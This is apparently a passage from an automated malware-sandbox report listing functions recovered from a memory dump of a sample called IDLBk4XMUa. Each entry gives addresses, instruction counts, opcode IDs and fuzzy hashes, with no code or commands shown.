                                              Function 00007FFAACCE054D Relevance: 1.5, Strings: 1, Instructions: 213COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 8!
                                              • API String ID: 0-1476783673
                                              • Opcode ID: a50d770cdba686b9706e8fe06ce916e2e02a65ddbc68b22aae7721958ad210d2
                                              • Instruction ID: 1d8f3d7fbdc1dd958708a51d4b8096072194d107eb9faa42c283cbf80108fccc
                                              • Opcode Fuzzy Hash: a50d770cdba686b9706e8fe06ce916e2e02a65ddbc68b22aae7721958ad210d2
                                              • Instruction Fuzzy Hash: 4451F6A3A0A6568FE755AB6CD8565F97BD0DF93221B0841B7D04CC7183DF18E40983C1
                                              Function 00007FFAACCEC198 Relevance: 1.4, Strings: 1, Instructions: 189COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: aK_H
                                              • API String ID: 0-2603984226
                                              • Opcode ID: 1a63df4a66350fc39140acf5c14fb868ccf51aa721ccb74d5302948c667688ca
                                              • Instruction ID: 7eddb860dc64b119ebeae26f12b37f0b902a6d79b455133f205b18aa33d81db0
                                              • Opcode Fuzzy Hash: 1a63df4a66350fc39140acf5c14fb868ccf51aa721ccb74d5302948c667688ca
                                              • Instruction Fuzzy Hash: D8514171608A4A8FDB85EF1CC458BA577E1FF6A300F1485B6D41DC7297DE34E8458B80
                                              Function 00007FFAACCE0640 Relevance: 1.4, Strings: 1, Instructions: 110COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 8!
                                              • API String ID: 0-1476783673
                                              • Opcode ID: d4def9ad392f86dc92dfe48b69a03757a27c78105e2059679daa2baacf8ff1fe
                                              • Instruction ID: 2ca90824d0d1a5cbedd1cb62b9d5225ec91e5dab0e2965e972f32bfe7af2832e
                                              • Opcode Fuzzy Hash: d4def9ad392f86dc92dfe48b69a03757a27c78105e2059679daa2baacf8ff1fe
                                              • Instruction Fuzzy Hash: 0F3125A2E1DA5A8FEB44AF7C8459AF97BD1EF56310F0481BAE00DC71D3DE18E8058381
                                              Function 00007FFAACCE7569 Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 8!
                                              • API String ID: 0-1476783673
                                              • Opcode ID: 90889d0aeb033ad31cd67bb1900b58e4bdda015f9c4e58bab4c998ab7a7b92da
                                              • Instruction ID: f319a9608b6b5386d9028ceab72d1bace55f2d93bb40f8188ef56b360b709919
                                              • Opcode Fuzzy Hash: 90889d0aeb033ad31cd67bb1900b58e4bdda015f9c4e58bab4c998ab7a7b92da
                                              • Instruction Fuzzy Hash: 5731E6A2E1DA8A8FEB45EB7C84596F87BE1EF66310B0441FAE04DC71D3DE18D8058381
                                              Function 00007FFAACCE7580 Relevance: 1.4, Strings: 1, Instructions: 103COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 8!
                                              • API String ID: 0-1476783673
                                              • Opcode ID: 575808cb05923cebf97d87147f1a893b6cfb35565a8483281fd7d2ff93cb6508
                                              • Instruction ID: 9996ccc6593712058cbb4ec11de536eac7c1531927858128fbdb63d98e35bda9
                                              • Opcode Fuzzy Hash: 575808cb05923cebf97d87147f1a893b6cfb35565a8483281fd7d2ff93cb6508
                                              • Instruction Fuzzy Hash: BD21F5A2E1894A8FEB88EB7CC449AF977D5EF99310F0445BAE01DC71D3DE18D8058781
                                              Function 00007FFAACCF89FA Relevance: 1.4, Strings: 1, Instructions: 101COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: J_^>
                                              • API String ID: 0-1465148345
                                              • Opcode ID: 43b9d53df9ab6177cbbb3ce2d76b42c7a1ad6fcc07df721e32fa06673ab89fef
                                              • Instruction ID: 0f746203679075e86e811ae6174a10be42bacf9ba2443fb0471710adbb6339c1
                                              • Opcode Fuzzy Hash: 43b9d53df9ab6177cbbb3ce2d76b42c7a1ad6fcc07df721e32fa06673ab89fef
                                              • Instruction Fuzzy Hash: 9B21F97162CA414FE74CA61894469BAB7D1EFD9314F5040AEF0AF835D7EE64F8064782
                                              Function 00007FFAACCF8B9D Relevance: 1.3, Strings: 1, Instructions: 83COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: "
                                              • API String ID: 0-3656568849
                                              • Opcode ID: fc6d94ee4452a46c1bb17fff68bacc498c46c3c52af3ba3f134111107fd21aa8
                                              • Instruction ID: f49f8d74fe37485caf9f3d5ae97ac9e701270dd4aea7f7a0b2177e64cea4eb9f
                                              • Opcode Fuzzy Hash: fc6d94ee4452a46c1bb17fff68bacc498c46c3c52af3ba3f134111107fd21aa8
                                              • Instruction Fuzzy Hash: 34115963A199455FF344B67C980E0F96BC4DFEA220B0041BBE05DC729BEE64BC4742D1
                                              Function 00007FFAACCE3E74 Relevance: 1.3, Strings: 1, Instructions: 59COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 8e%
                                              • API String ID: 0-1390493536
                                              • Opcode ID: 06140cae7df0027a824c1c16c0ebcf87744e32b658e763ef165b0e9bacc04db2
                                              • Instruction ID: c393be268abca4e0cb021e5a43b5194898d9027d2f09f1038183d48aff141798
                                              • Opcode Fuzzy Hash: 06140cae7df0027a824c1c16c0ebcf87744e32b658e763ef165b0e9bacc04db2
                                              • Instruction Fuzzy Hash: 49018E9191D7860FF79AAA3C98656247FE0CF57240B4C01FBD489CB1E3D94899898393
                                              Function 00007FFAACCE3E80 Relevance: 1.3, Strings: 1, Instructions: 52COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 8e%
                                              • API String ID: 0-1390493536
                                              • Opcode ID: f6ca1490c0ebb80a97e7df7bb1f052d890dbe7bbbf599b16f4bee7d1536137f2
                                              • Instruction ID: 2a484081f31fc80c8733f202a2e7d742518a6f9a5fdc3c5b102326da8323cd08
                                              • Opcode Fuzzy Hash: f6ca1490c0ebb80a97e7df7bb1f052d890dbe7bbbf599b16f4bee7d1536137f2
                                              • Instruction Fuzzy Hash: 3801D491A1DA890FF78AAA3C9825A647BE0CF57240F0C00FBD84DCB1E3DD1899854393
                                              Function 00007FFAACCE909F Relevance: 1.1, Instructions: 1064COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ad14891019288dfc0407df28707a75f0b06c2e2a9387672de21cb55366775f16
                                              • Instruction ID: 75411e051cd6830b464952f58ddb052f646cfdb27bc80bb1cc0548a7519bf846
                                              • Opcode Fuzzy Hash: ad14891019288dfc0407df28707a75f0b06c2e2a9387672de21cb55366775f16
                                              • Instruction Fuzzy Hash: 1D721991D1EA8B8FF7559B3C84546B56BA2EF97300B5880F6D05DC71D7EF28E8098382
                                              Function 00007FFAACCE9C65 Relevance: .9, Instructions: 897COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 041bce5b62f679cf457c0d0b623f1493ad19d196f892e29ce79a0f667008578e
                                              • Instruction ID: 4b9e36314612a5e22b233be19f605c2a7b0fa615d72c882da60eb7e2ee39602e
                                              • Opcode Fuzzy Hash: 041bce5b62f679cf457c0d0b623f1493ad19d196f892e29ce79a0f667008578e
                                              • Instruction Fuzzy Hash: 055296A0A1DA8E8FEB85EB2CC455BB977E2EF56700F5441F6D01DC7297DE28E8058381
                                              Function 00007FFAACCF5D28 Relevance: .8, Instructions: 807COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 87b312052c7bfa66075f28b8f3e2f2a920e552941738425d3efa751505454cb7
                                              • Instruction ID: 10b498a2c70367bca84f89e14c930cdc14e1f76aadcb40784d2c6356b7262eb5
                                              • Opcode Fuzzy Hash: 87b312052c7bfa66075f28b8f3e2f2a920e552941738425d3efa751505454cb7
                                              • Instruction Fuzzy Hash: 283208B1A2EB868FF7D9972844255747BA1EF96300B5840FAD06EC75D3FD24F8498382
                                              Function 00007FFAACCF765D Relevance: .8, Instructions: 788COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 488f175ab76bd89bec7a21aac7fddd60a7b2ac0f57bbceae58f04b202073c03e
                                              • Instruction ID: bca784aede0413b45bd78bbef91b2ff66da7f4c599d3fe25e3f3fb62d6e6757a
                                              • Opcode Fuzzy Hash: 488f175ab76bd89bec7a21aac7fddd60a7b2ac0f57bbceae58f04b202073c03e
                                              • Instruction Fuzzy Hash: 4F329D70719A498FEBA5EB2CC494B7577E1FF5A300F1440FAD45ECB2A6CA24EC498781
                                              Function 00007FFAACCF3399 Relevance: .7, Instructions: 694COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e86ba2c69fb9ce28a17cee48265ef160a50e6c6f812f5fc0c7f4e60e11eeff60
                                              • Instruction ID: ec18b51391be4820953bacfcf411d5722cd235b86a301143a7d5dd49dbd0089e
                                              • Opcode Fuzzy Hash: e86ba2c69fb9ce28a17cee48265ef160a50e6c6f812f5fc0c7f4e60e11eeff60
                                              • Instruction Fuzzy Hash: 69329470A19B4E8FEB89EF28C454AA977F1FF59300B5445A9D41EC7296CB34EC46CB80
                                              Function 00007FFAACCF3E49 Relevance: .7, Instructions: 692COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 31a6772f0fef7ae1d5b7fa5b4ba6994ff367578504abf5addc6124a7e36c75be
                                              • Instruction ID: f51f9e4a7e0c7f88e7c3261c7557108ad456fd8bbaa0e01815eb10861a5f5e4b
                                              • Opcode Fuzzy Hash: 31a6772f0fef7ae1d5b7fa5b4ba6994ff367578504abf5addc6124a7e36c75be
                                              • Instruction Fuzzy Hash: A9328370A19B4E8FEB89DF28C454AA977F1FF59300B5485A9D41EC7296CF34E846CB80
                                              Function 00007FFAACCFA700 Relevance: .7, Instructions: 684COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 856c495c37f42b1f6791b55eed1a79fb7b1caaf46157fd0be621798efc5f7acc
                                              • Instruction ID: 8a9e952954746fbe25df89e25314e640c1bed12b241b75924a6e7342b1eced04
                                              • Opcode Fuzzy Hash: 856c495c37f42b1f6791b55eed1a79fb7b1caaf46157fd0be621798efc5f7acc
                                              • Instruction Fuzzy Hash: 4F328770A18B4E8FEB88EF18C454AA9B7E1FF59304B5445A9D41EC7296CB34EC46CB80
                                              Function 00007FFAACD38A10 Relevance: .7, Instructions: 667COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a7d8fd011b59946e592336b922a16ffecc2fdfd7f80f565752b1ab754c36f995
                                              • Instruction ID: e47ee7ceb9e2eec6b1a1591bf3b256c04a7cb6788cf1aadb2648387449353c63
                                              • Opcode Fuzzy Hash: a7d8fd011b59946e592336b922a16ffecc2fdfd7f80f565752b1ab754c36f995
                                              • Instruction Fuzzy Hash: C1222771A0DB858FE756EB2888556757BE1EF57300B0481FAD05DC7293DE28EC4AC392
                                              Function 00007FFAACD03B28 Relevance: .6, Instructions: 614COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 648d84afe599a64cc7e72f8173358376a833a9b50d104cbe0365373ef09f42fd
                                              • Instruction ID: 9d2dff8a0136958fc2cc566fd2de6af04e3a138256d513b632e7fa8858343134
                                              • Opcode Fuzzy Hash: 648d84afe599a64cc7e72f8173358376a833a9b50d104cbe0365373ef09f42fd
                                              • Instruction Fuzzy Hash: 7D122431A1DB458FE7A8DB28C481571B7E1FF96300B14C5BDD0AEC7592EA25EC4A87C1
                                              Function 00007FFAACD3CB90 Relevance: .6, Instructions: 606COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 13542b41d33b5bd06e2b0085c126033f8cb09a3a62564243e170b4630816b681
                                              • Instruction ID: b63c8ec6b84510436ae48281d3762dadd146f6a6421221a44e19cc661d62c49a
                                              • Opcode Fuzzy Hash: 13542b41d33b5bd06e2b0085c126033f8cb09a3a62564243e170b4630816b681
                                              • Instruction Fuzzy Hash: 6302D9A3B0E2A68EF211A77CA8555F53FD0DF92235B0842B7D19DCA193DF08A44B82D5
                                              Function 00007FFAACD03B30 Relevance: .5, Instructions: 504COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: aec88f203b434a9bc659718a011e028674af2cb81abd9bb050a4695ffa8bba45
                                              • Instruction ID: b5ddf52f8fa643616fb92e015173a17f86b3cd7698b588060d248e1642a1dfad
                                              • Opcode Fuzzy Hash: aec88f203b434a9bc659718a011e028674af2cb81abd9bb050a4695ffa8bba45
                                              • Instruction Fuzzy Hash: D9E13731A1DA498FE768DB28D4455B1B3E1FF96300F1485BDD0AEC3592EA25EC4A87C1
                                              Function 00007FFAACD347A0 Relevance: .5, Instructions: 455COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 345aa057ae8da428842c49b03b1731e56f6e94be6db9caa33459674ed1c36a96
                                              • Instruction ID: afd18b1c7776c7cfe12c8a738536282e9f6cb142731afe4a9e25705687cba741
                                              • Opcode Fuzzy Hash: 345aa057ae8da428842c49b03b1731e56f6e94be6db9caa33459674ed1c36a96
                                              • Instruction Fuzzy Hash: 64F19034A19A4A8FFB98DB18C484B7177E1FF55304F5485B9C45EC7286DB39E88AC780
                                              Function 00007FFAACCE8DA9 Relevance: .4, Instructions: 450COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bb1af03583790cb9bf7ad0bc9dff7efdfbe4cf0da371ef7a69d820172415ad33
                                              • Instruction ID: bfed9aa87e8885bca96344418343e3f7c6244ba871ca3c1ad0594b8b36be269c
                                              • Opcode Fuzzy Hash: bb1af03583790cb9bf7ad0bc9dff7efdfbe4cf0da371ef7a69d820172415ad33
                                              • Instruction Fuzzy Hash: CDD1D751A0D94E4FFB89AB3CD4A56BC6A96EF8A300F1444FAD05DC71D7DE28980683C2
                                              Function 00007FFAACCE9600 Relevance: .4, Instructions: 441COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 46b0f7a62b3a0e29bb2cf0d7b45db7a74eb42dafd6773e5e3b270903a65cf213
                                              • Instruction ID: 305ddb7e25278fa4b83a990a523f01395516a27653820830ea5de456bc22e6d6
                                              • Opcode Fuzzy Hash: 46b0f7a62b3a0e29bb2cf0d7b45db7a74eb42dafd6773e5e3b270903a65cf213
                                              • Instruction Fuzzy Hash: 20D10D91E1DE8B8FF7959B3C94546B56BA2EF97300B5880FAC05DC71D7EE28D8058382
                                              Function 00007FFAACCF15F8 Relevance: .4, Instructions: 406COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b6d63e18a0a6e31f383449ba7487e45efc08024cc39b8ad851a50d93e1dcbf1a
                                              • Instruction ID: 832f4fa4eece1a6ef8466ef81b612bc27d383f942caae00a75f041f6525f5326
                                              • Opcode Fuzzy Hash: b6d63e18a0a6e31f383449ba7487e45efc08024cc39b8ad851a50d93e1dcbf1a
                                              • Instruction Fuzzy Hash: 24C1F561A1E7068EF759AF28C4165797BD2DFC7314F2480BED48FC62D7DD28A84A42C2
                                              Function 00007FFAACCFA365 Relevance: .4, Instructions: 402COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b03feafd161f5f83c7d0f525692be03b72bf2bd94a93d13e0b0e3f99310f4127
                                              • Instruction ID: 607258c5060a2436d41cf41774a0765da62290de2b4872fca38f565fea3ef793
                                              • Opcode Fuzzy Hash: b03feafd161f5f83c7d0f525692be03b72bf2bd94a93d13e0b0e3f99310f4127
                                              • Instruction Fuzzy Hash: 15D18171A28F058FDB58EF2CD0559A5B3E1FFA930075441AAE01EC76A6DF34F8068B81
                                              Function 00007FFAACCE3EF9 Relevance: .4, Instructions: 372COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 13711f6ff4b40255dd5240e097631e408bd5c03802f18e9d27db9d3f6762369e
                                              • Instruction ID: 122a40a3af2809467a466eb880f25ee897e9f526dd0610eb052879daf0467c5c
                                              • Opcode Fuzzy Hash: 13711f6ff4b40255dd5240e097631e408bd5c03802f18e9d27db9d3f6762369e
                                              • Instruction Fuzzy Hash: 90C119719096898FFB94DF68C4552B977E1FF97310F0481BAD45DC72D2DF28980A8781
                                              Function 00007FFAACD00080 Relevance: .4, Instructions: 367COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9d072646504e305149e7dcb1334adf9dd8be4abdfab92b26c3abc2d60c44eb5f
                                              • Instruction ID: b94bea162bc044f307bff94efbc17789c9b924251c0e0f2ce3ac94215c02539d
                                              • Opcode Fuzzy Hash: 9d072646504e305149e7dcb1334adf9dd8be4abdfab92b26c3abc2d60c44eb5f
                                              • Instruction Fuzzy Hash: 9EA1583162EF458FE3599B1898465B17BE1EF5A311B1441BED09ECB1A2ED24F84AC3C1
                                              Function 00007FFAACCF95F0 Relevance: .3, Instructions: 338COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: aa33a487812392b79528d693ae252a7c60baa44d039158c96bf4019a1ea42009
                                              • Instruction ID: 784bda3dc9373cab1d755d82de5a3df1509da259de99a35e4e03278557726d8d
                                              • Opcode Fuzzy Hash: aa33a487812392b79528d693ae252a7c60baa44d039158c96bf4019a1ea42009
                                              • Instruction Fuzzy Hash: 29A13C7190E78A8FF7559F2898116F57BE0EF47314F1941BAD05DCB183DA28A80A87D1
                                              Function 00007FFAACCF5D50 Relevance: .3, Instructions: 327COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 01d4370c39c4e55ccadc0076e6d39d2f157873e24a9fe8933fe328be09b58ea2
                                              • Instruction ID: cbcfa2c893084ce7b7fb166cea9271b213726f2e272bc02b1cf8142b64d37d3a
                                              • Opcode Fuzzy Hash: 01d4370c39c4e55ccadc0076e6d39d2f157873e24a9fe8933fe328be09b58ea2
                                              • Instruction Fuzzy Hash: FBA1A330A19A09CFEB98EF1CC455A7877E1FF5A301B1041A9E45EDB292EF25EC45CB81
                                              Function 00007FFAACCED826 Relevance: .3, Instructions: 309COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 24ce9fbf0cc5a2ccafa1f065564c7a5a2b8b42f354374637cb01ae336a1d43bb
                                              • Instruction ID: 858ecc3834ff3b2ab1d62394ca1bb8de17b09d8458d9af83ab7fc4191974c0cb
                                              • Opcode Fuzzy Hash: 24ce9fbf0cc5a2ccafa1f065564c7a5a2b8b42f354374637cb01ae336a1d43bb
                                              • Instruction Fuzzy Hash: A7C1BF74504A4E8FEBC4EF18C49C7A937E1FB69305F24457E981DCB295DB329892CB40
                                              Function 00007FFAACCE10A5 Relevance: .3, Instructions: 306COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b374e5ca7ab0831b971da86aad6b8c1cb6ac32a475192b1109acfbc1c0316147
                                              • Instruction ID: 056064b9f1b1264782a5a400b9339d229301530fad2d5b7883f4774585093811
                                              • Opcode Fuzzy Hash: b374e5ca7ab0831b971da86aad6b8c1cb6ac32a475192b1109acfbc1c0316147
